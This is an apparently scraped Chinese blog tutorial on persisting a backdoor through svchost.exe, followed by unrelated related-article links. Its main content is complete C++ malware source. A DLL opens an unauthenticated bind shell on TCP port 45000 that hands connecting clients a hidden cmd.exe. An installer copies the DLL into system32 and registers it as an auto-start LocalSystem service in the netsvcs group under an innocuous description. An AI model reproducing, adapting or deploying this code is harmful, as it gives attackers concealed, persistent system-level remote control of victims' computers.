安全之路 —— 利用SVCHost.exe系统服务实现后门自启动

简介

在Windows系统中有一个系统服务控制器，叫做SVCHost.exe，它可以用来管理系统的多组服务。它与普通的服务控制不同的是它采用dll导出的ServiceMain主函数实现服务运行，详细原理可参照Blog：SVCHOST启动服务实战。我们在使用此方法时，要有两个步骤：

编写dll文件封装ServiceMain导出函数

编写负责服务安装与移除的exe文件

本例中需要将.exe与.dll文件放置在同一个文件夹下运行，.exe文件会将dll复制进系统目录。

C++代码样例

DLL程序代码：

///////////////////////////////////////
//
// FileName : sysWork.cpp
// Creator : PeterZ1997
// Date : 2018-5-8 22:07
// Comment : Dll of ServiceMain Function
//
///////////////////////////////////////
#include <cstdio>
#include <iostream>
#include <cstdlib>
#include <cstring>
#include <strsafe.h>
#include <WinSock2.h>
#include <winsock.h>
#include <windows.h>
#include <winsvc.h>
using namespace std;
#pragma comment(lib, "ws2_32.lib")
SERVICE_STATUS g_ServiceStatus;
SERVICE_STATUS_HANDLE g_hServiceStatus;
const unsigned int MAX_COUNT = 255; /// String Max Length
const DWORD PORT = 45000;           /// Listen Port
const unsigned int LINK_COUNT = 30; /// Max Link Number
/**
 * @brief CallBack Function to Translate Service Control Code
 * @param dwCode        Service Control Code
 */
void WINAPI ServiceControl(DWORD dwCode)
{
	switch (dwCode)
	{
		//服务暂停
	case SERVICE_CONTROL_PAUSE:
		g_ServiceStatus.dwCurrentState = SERVICE_PAUSED;
		break;
		//服务继续
	case SERVICE_CONTROL_CONTINUE:
		g_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
		break;
		//服务停止
	case SERVICE_CONTROL_STOP:
		g_ServiceStatus.dwCurrentState = SERVICE_STOPPED;
		g_ServiceStatus.dwWin32ExitCode = 0;
		g_ServiceStatus.dwCheckPoint = 0;
		g_ServiceStatus.dwWaitHint = 0;
		break;
	case SERVICE_CONTROL_INTERROGATE:
		break;
	default:
		break;
	}
	//设置服务状态
	if (SetServiceStatus(g_hServiceStatus, &g_ServiceStatus) == 0)
	{
		printf("Set Service Status Error\n");
	}
	return;
}
/**
 * @brief Start Remote Shell
 * @param lpParam       the Client Handle
 */
DWORD WINAPI StartShell(LPVOID lpParam)
{
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	CHAR cmdline[MAX_COUNT] = { 0 };
	GetStartupInfo(&si);
	si.cb = sizeof(STARTUPINFO);
	si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)lpParam;
	si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
	si.wShowWindow = SW_HIDE;
	GetSystemDirectory(cmdline, sizeof(cmdline));
	strcat_s(cmdline, sizeof(cmdline), "\\cmd.exe");
	while (!CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NULL, NULL, NULL, &si, &pi))
	{
		Sleep(100);
	}
	WaitForSingleObject(pi.hProcess, INFINITE);
	CloseHandle(pi.hProcess);
	CloseHandle(pi.hThread);
	return 0;
}
/**
 * @brief Service Running Function
 * @param lpParam      NULL
 */
DWORD WINAPI RunService(LPVOID lpParam)
{
	CHAR wMessage[MAX_COUNT] = "<================= Welcome to Back Door >_< ==================>\n";
	SOCKET sClient[30];
	DWORD dwThreadId[30];
	HANDLE hThread[30];
	WSADATA wsd;
	if (WSAStartup(0x0202, &wsd))
	{
		printf("WSAStartup Process Error\n");
		return 0;
	}
	SOCKET sListen = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
	sockaddr_in sin;
	sin.sin_family = AF_INET;
	sin.sin_port = htons(PORT);
	sin.sin_addr.S_un.S_addr = INADDR_ANY;
	if (bind(sListen, (LPSOCKADDR)&sin, sizeof(sin))) return 0;
	if (listen(sListen, LINK_COUNT)) return 0;
	for (int i = 0; i < LINK_COUNT; i++)
	{
		sClient[i] = accept(sListen, NULL, NULL);
		hThread[i] = CreateThread(NULL, 0, StartShell, (LPVOID)sClient[i], 0, &dwThreadId[i]);
		send(sClient[i], wMessage, strlen(wMessage), 0);
	}
	WaitForMultipleObjects(LINK_COUNT, hThread, TRUE, INFINITE);
	return 0;
}
/**
 * @brief Export Function
 */
extern"C" __declspec(dllexport) void __stdcall ServiceMain(DWORD dwArgc, LPTSTR *lpArgv)
{
	HANDLE hThread;
	g_ServiceStatus.dwCheckPoint = 0;
	g_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_PAUSE_CONTINUE | SERVICE_ACCEPT_STOP;
	g_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
	g_ServiceStatus.dwServiceSpecificExitCode = 0;
	g_ServiceStatus.dwServiceType = SERVICE_WIN32;
	g_ServiceStatus.dwWaitHint = 0;
	g_ServiceStatus.dwWin32ExitCode = 0;
	g_hServiceStatus = RegisterServiceCtrlHandler("BackDoor", ServiceControl);
	if (!g_hServiceStatus)
	{
		printf("Register Service Error\n");
		return;
	}
	g_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
	g_ServiceStatus.dwCheckPoint = 0;
	g_ServiceStatus.dwWaitHint = 0;
	if (!SetServiceStatus(g_hServiceStatus, &g_ServiceStatus))
	{
		printf("Set ServiceStatus Error !\n");
		return;
	}
	hThread = CreateThread(NULL, 0, RunService, NULL, 0, NULL);
	if (!hThread)
	{
		printf("Create Thread Error\n");
	}
	return;
}
/**
 * @brief DLL Main Function
 */
BOOL APIENTRY DllMain(HANDLE hModule,
	DWORD ul_reason_for_call,
	LPVOID lpReserved)
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_DETACH:
	{
		ServiceControl(SERVICE_CONTROL_STOP);
		break;
	}
	default:
		break;
	}
	return TRUE;
}

2 . EXE程序代码：

//////////////////////////////////////////////
//
// FileName : SVCHostDemo.cpp
// Creator : PeterZ1997
// Date : 2018-5-8 01:17
// Comment : use SVCHost.exe to achieve software auto-run
//
//////////////////////////////////////////////
#include <iostream>
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include "strsafe.h"
#include <windows.h>
#include <winsvc.h>
#include <shlwapi.h>
#pragma comment(lib, "shlwapi.lib")
using namespace std;
const unsigned int MAX_COUNT = 255;      //字符串长度
CHAR szRegInfo[MAX_COUNT] = "\0";        //注册表信息缓冲区
SC_HANDLE g_hServiceHandle;              //服务实例句柄
SERVICE_STATUS g_ssServiceStatus;        //服务状态结构体
SERVICE_STATUS_HANDLE g_ssServiceHandle; //服务状态句柄
/**
 * @brief 封装REG_MULTI_SZ型注册表操作
 * @param hRoot            root key
 * @param szSubKey         sub key after the root key
 * @param szValueName      key name
 * @param szData           key Data
 * @param cp               length of (BYTE*)szValue
 */
BOOL setSZMultiStringValueToReg(HKEY hRoot, LPCSTR szSubKey, LPCSTR szValueName, LPSTR szValue, DWORD cp)
{
	HKEY hKey;
	long lRet;
	if (lRet = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL)) return false;
	if (lRet = RegSetValueEx(hKey, szValueName, 0, REG_MULTI_SZ, (BYTE*)szValue, cp)) return false;
	RegCloseKey(hKey);
	RegCloseKey(hRoot);
	return true;
}
/**
 * @brief 封装REG_SZ型注册表操作
 * @param hRoot             root key
 * @param szSubKey          sub key after the root key
 * @param szValueName       key name
 * @param szData            key Data
 */
BOOL setSZStringValueToReg(HKEY hRoot, LPCSTR szSubKey, LPCSTR szValueName, LPCSTR szValue)
{
	HKEY hKey;
	long lRet;
	if (lRet = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL)) return false;
	if (lRet = RegSetValueEx(hKey, szValueName, 0, REG_SZ, (BYTE*)szValue, strlen(szValue))) return false;
	RegCloseKey(hKey);
	RegCloseKey(hRoot);
	return true;
}
/**
* @brief 封装REG_EXPAND_SZ型注册表操作
* @param hRoot           root key
* @param szSubKey        sub key after the root key
* @param szValueName     key name
* @param szData          key Data
*/
BOOL setExpandSZStringValueToReg(HKEY hRoot, LPCSTR szSubKey, LPCSTR szValueName, LPCSTR szValue)
{
	HKEY hKey;
	long lRet;
	if (lRet = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL)) return false;
	if (lRet = RegSetValueEx(hKey, szValueName, 0, REG_EXPAND_SZ, (BYTE*)szValue, strlen(szValue))) return false;
	RegCloseKey(hKey);
	RegCloseKey(hRoot);
	return true;
}
/**
 * @brief 封装DWORD型注册表操作
 * @param hRoot          root key
 * @param szSubKey       sub key after the root key
 * @param szValueName    key name
 * @param szData         key Data
 */
BOOL setDWORDValueToReg(HKEY hRoot, LPCSTR szSubKey, LPCSTR szValueName, DWORD szValue)
{
	HKEY hKey;
	long lRet;
	if (lRet = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL)) return false;
	if (lRet = RegSetValueEx(hKey, szValueName, 0, REG_DWORD, (BYTE*)&szValue, sizeof(DWORD))) return false;
	RegCloseKey(hKey);
	RegCloseKey(hRoot);
	return true;
}
/**
 * @brief get Registry Value Info(REG_MULTI_SZ)
 * @param hRoot         root key
 * @param szSubKey      sub key after the root key
 * @param szValueName   key name
 */
BOOL getRegInfo(HKEY hRoot, LPCTSTR szSubKey, LPCTSTR szValueName)
{
	HKEY hKey;
	DWORD dwType = REG_MULTI_SZ;
	DWORD dwLenData = strlen(szRegInfo);
	LONG lRes = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
	if (lRes != ERROR_SUCCESS)
	{
		RegCloseKey(hKey);
		RegCloseKey(hRoot);
		return false;
	}
	RegQueryValueEx(hKey, szValueName, 0, &dwType, NULL, &dwLenData);
	lRes = RegQueryValueEx(hKey, szValueName, 0, &dwType, (LPBYTE)szRegInfo, &dwLenData);
	if (lRes != ERROR_SUCCESS)
	{
		RegCloseKey(hKey);
		RegCloseKey(hRoot);
		return false;
	}
	RegCloseKey(hKey);
	RegCloseKey(hRoot);
	return true;
}
/**
 * @brief CallBack Function to Translate Service Control Code
 * @param dwCode       Service Control Code
 */
void WINAPI ServiceControl(DWORD dwCode)
{
	switch (dwCode)
	{
	case SERVICE_CONTROL_PAUSE:
		g_ssServiceStatus.dwCurrentState = SERVICE_PAUSED;
		break;
	case SERVICE_CONTROL_CONTINUE:
		g_ssServiceStatus.dwCurrentState = SERVICE_RUNNING;
		break;
	case SERVICE_CONTROL_STOP:
		g_ssServiceStatus.dwCurrentState = SERVICE_STOPPED;
		g_ssServiceStatus.dwWin32ExitCode = 0;
		g_ssServiceStatus.dwCheckPoint = 0;
		g_ssServiceStatus.dwWaitHint = 0;
		break;
	case SERVICE_CONTROL_INTERROGATE:
		break;
	default:
		break;
	}
	if (SetServiceStatus(g_ssServiceHandle, &g_ssServiceStatus) == 0)
	{
		printf("Set Service Status Error\n");
	}
	return;
}
/**
 * @brief 安装服务
 */
BOOL InstallService()
{
	CHAR szSysPath[MAX_COUNT] = "\0";
	CHAR szRegGroup[MAX_COUNT][MAX_COUNT] = { "\0" };
	CHAR* szTargetString = (CHAR*)malloc(MAX_COUNT * 8);
	memset(szTargetString, 0, sizeof(szTargetString));
	register int count = 0;
	register int cp = 0;
	GetSystemDirectory(szSysPath, sizeof(szSysPath));
	StringCchCat(szSysPath, sizeof(szSysPath), "\\sysWork.dll");
	CopyFile("sysWork.dll", szSysPath, true);
	setSZStringValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\NewService", "Description", "System Test Server");
	setSZStringValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\NewService", "DisplayName", "NewService");
	setDWORDValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\NewService", "ErrorControl", 0x00000001);
	setExpandSZStringValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\NewService", "ImagePath", "%systemRoot%\\system32\\svchost.exe -k netsvcs");
	setSZStringValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\NewService", "ObjectName", "LocalSystem");
	setDWORDValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\NewService", "Start", 0x00000002);
	setDWORDValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\NewService", "Type", 0x00000010);
	setExpandSZStringValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\NewService\\Parameters", "ServiceDll", szSysPath);
	getRegInfo(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", "netsvcs");
	register LPSTR p = LPSTR(szRegInfo);
	for (; *p; p += strlen(p) + 1, count++)
	{
		StringCchCopy(szRegGroup[count], sizeof(szRegGroup[count]), p);
	}
	StringCchCopy(szRegGroup[count], sizeof(szRegGroup), "NewService");
	p = LPSTR(szTargetString);
	for (int i = 0; i <= count; i++)
	{
		strcpy_s(p, strlen(szRegGroup[i]) + 1, szRegGroup[i]);
		p += strlen(szRegGroup[i]) + 1;
		cp += strlen(szRegGroup[i]) + 1;
	}
	setSZMultiStringValueToReg(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", "netsvcs", szTargetString, cp);
	return true;
}
/**
 * @brief 移除服务
 */
BOOL RemoveService()
{
	SC_HANDLE hscManager;
	CHAR szRegGroup[MAX_COUNT][MAX_COUNT] = { "\0" };
	CHAR* szTargetString = (CHAR*)malloc(MAX_COUNT * 8);
	memset(szTargetString, 0, sizeof(szTargetString));
	register int count = 0;
	register int cp = 0;
	CHAR szSysPath[MAX_COUNT] = "\0";
	GetSystemDirectory(szSysPath, sizeof(szSysPath));
	StringCchCat(szSysPath, sizeof(szSysPath), "\\sysWork.dll");
	hscManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
	if (!hscManager)
	{
		printf("Open Service Manager Error\n");
		return false;
	}
	printf("Open Service Manager Success\n");
	g_hServiceHandle = OpenService(hscManager, "NewService", SERVICE_ALL_ACCESS);
	if (!g_hServiceHandle)
	{
		printf("Open Service Error\n");
		return false;
	}
	printf("Open Service Success\n");
	if (QueryServiceStatus(g_hServiceHandle, &g_ssServiceStatus))
	{
		if (g_ssServiceStatus.dwCurrentState == SERVICE_RUNNING)
		{
			ControlService(g_hServiceHandle, SERVICE_CONTROL_STOP, &g_ssServiceStatus);
		}
	}
	else
	{
		printf("Service Status Get Error\n");
		CloseServiceHandle(g_hServiceHandle);
		CloseServiceHandle(hscManager);
		return false;
	}
	if (!DeleteService(g_hServiceHandle))
	{
		printf("Delete Service Error\n");
		CloseServiceHandle(g_hServiceHandle);
		CloseServiceHandle(hscManager);
		return false;
	}
	if (SHDeleteKey(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\NewService"))
	{
		printf("Delete RegKey Error\n");
		CloseServiceHandle(g_hServiceHandle);
		CloseServiceHandle(hscManager);
		return false;
	}
	memset(szRegInfo, 0, sizeof(szRegInfo));
	getRegInfo(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", "netsvcs");
	register LPSTR p = LPSTR(szRegInfo);
	for (; *p; p += strlen(p) + 1)
	{
		if (!strcmp(p, "NewService"))
		{
			continue;
		}
		StringCchCopy(szRegGroup[count], sizeof(szRegGroup[count]), p);
		count++;
	}
	p = LPSTR(szTargetString);
	for (int i = 0; i <= count; i++)
	{
		strcpy_s(p, strlen(szRegGroup[i]) + 1, szRegGroup[i]);
		p += strlen(szRegGroup[i]) + 1;
		cp += strlen(szRegGroup[i]) + 1;
	}
	setSZMultiStringValueToReg(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", "netsvcs", szTargetString, cp);
	printf("Remove Service Success\n");
	DeleteFile(szSysPath);
	CloseServiceHandle(g_hServiceHandle);
	CloseServiceHandle(hscManager);
	return true;
}
/**
 * @brief Main Function
 */
int main(int argc, char* argv[])
{
	if (argc == 2)
	{
		if (!stricmp(argv[1], "--install"))
		{
			if (!InstallService())
			{
				printf("[!]Service Operation Error\n");
			}
			else
			{
				printf("[*]Service Operation Success\n");
			}
		}
		else if (!stricmp(argv[1], "--remove"))
		{
			if (!RemoveService())
			{
				printf("[!]Service Operation Error\n");
			}
			else
			{
				printf("[*]Service Operation Success\n");
			}
		}
		else
		{
			printf("[Usage] => *.exe [--install]/[--remove]\n");
		}
	}
	else {
		printf("[Usage] => *.exe [--install]/[--remove]\n");
	}
	return 0;
}

安全之路 —— 利用SVCHost.exe系统服务实现后门自启动的更多相关文章

电脑Svchost.exe 进程占CPU100% 的解决办法
Windows Update诊断和修复修复工具 http://support.microsoft.com/mats/windows_update/zh-cn Svchost.exe占用CPU100%的 ...
关于WIN7 内存占用很大的问题svchost.exe
svchost.exe 是用来启动系统服务的,所以某个 svchost.exe 占用内存过大,可能就是它启动的那个服务占用内存过大,所以只要停止并禁用那个服务就行了. 一般来说占用内存最大的服务是 S ...
win7 64位的 svchost.exe 占用内存过大的问题
svchost.exe 是用来启动系统服务的,所以某个 svchost.exe 占用内存过大,可能就是它启动的那个服务占用内存过大,所以只要停止并禁用那个服务就行了. 一般来说占用内存最大的服务是 S ...
windows svchost.exe 引起的出现的莫名其妙的窗口失去焦点
我不知道你们遇到没,反正我是遇到了,现在我就把解决方法给你们,当然都是从网上整理下来的这个失去焦点可以分为两种,一种是病毒,一种是系统自带的问题首先你得知道自己的窗口被什么给挤掉了焦点先看看这篇 ...
利用certutil.exe实现在批处理（bat）中嵌入可执行文件或者各种媒体、图片之类二进制文件的简单方法！
实际上利用certutil.exe 把二进制文件(包括各种文件,exe可执行程序,图片,声音,mp3) 经过base64编码为文本,可以实现把这些文件嵌入到批处理代码中. 有什么用?: 举个例子,批处 ...
win10 svchost.exe (LocalSystemNetworkRestricted)大量读写数据
博主的笔记本联想Y50开机完毕后会不停滴读硬盘/写硬盘,导致开机后一段时间内无法正常使用电脑(硬盘读写高峰期).打开资源监视器发现是"svchost.exe (LocalSystemNetw ...
解析利用wsdl.exe生成webservice代理类的详解
利用wsdl.exe生成webservice代理类:根据提供的wsdl生成webservice代理类1.开始->程序->Visual Studio 2005 命令提示2.输入如下红色标记部 ...
win7的svchost.exe占用内存过高如何解决
方法/步骤 1 在我的电脑上点击鼠标右键,选择[管理] 步骤阅读 2 选择右侧[服务和应用程序]下的[服务]选项步骤阅读 3 找到名称我Superfetch的服务,双击鼠标左键. 步骤阅读 4 选择 ...
svchost.exe是什么？为什么一直在运行
原文:http://www.howtogeek.com/howto/windows-vista/what-is-svchostexe-and-why-is-it-running/ 自己简单翻译了下,图 ...

随机推荐

如何精准实现OCR文字识别？
欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 本文由云计算基础发表于云+社区专栏前言 2018年3月27日腾讯云云+社区联合腾讯云智能图像团队共同在客户群举办了腾讯云OCR文字识别-- ...
tar 压缩解压
tar命令 tar可以为文件和目录创建档案.利用tar,用户可以为某一特定文件创建档案(备份文件),也可以在档案中改变文件, 或者向档案中加入新的文件.tar最初被用来在磁带上创建档案,现在,用户可 ...
Golang 接口interface
接口interface 接口是一个或多个方法签名的集合只要某个类型拥有该接口的所有方法签名,即算实现该接口,无需显示声明实现了哪个接口,这成为Structural Typing 接口只有方法声明,没 ...
windows环境下搭建Java开发环境（一）：jdk安装和配置
一.资源下载官网:http://www.oracle.com/technetwork/java/javase/downloads/index.html 本人安装的是jdk1.8,百度云资源:链接:h ...
附件十四面3D模型的自动化生成
附件十四面的3D模型可以自动生成了 2017-10-14 刘崇军风螺旋线这个故事开始于大约半年前,偶然从电脑里翻到了曾经收藏的这本书<Automatic SketchUp>,英语+3D ...
使用 ReentrantLock 和 Condition 实现一个阻塞队列
前言从之前的阻塞队列的源码分析中,我们知道,JDK 中的阻塞队列是使用 ReentrantLock 和 Condition 实现了,我们今天来个简易版的.代码如下: 代码 public class ...
C# ABP 配置连接数据库&创建表
1. 配置连接数据库配置连接数据库很简单,只需要打开Web项目,然后找到Web.config,配置如下: <connectionStrings> <add name="D ...
从客户端(ASPxFormLayout1$txtRule="<YYYY><MM><DD><XXXX>")中检测到有潜在危险的 Request.Form 值
在有文本框的值属于这种时<YYYY><MM><DD><XXXX>,会报这个错在webconfig中加入 <httpRuntime request ...
Windows下当地RabbitMQ服务的安装
Windows下本地RabbitMQ服务的安装本文参考:刘若泽相关技术文档当然这些内容页可以通过RabbitMQ官方网站获得. RabbitMQ配置说明手册一.RaibbitMQ服务器配置 1． ...
Charlie's Change（完全背包+路径记忆）
Charlie's Change Time Limit: 1000MS Memory Limit: 30000K Total Submissions: 3176 Accepted: 913 D ...

安全之路 —— 利用SVCHost.exe系统服务实现后门自启动

简介

C++代码样例

安全之路 —— 利用SVCHost.exe系统服务实现后门自启动的更多相关文章

随机推荐

热门专题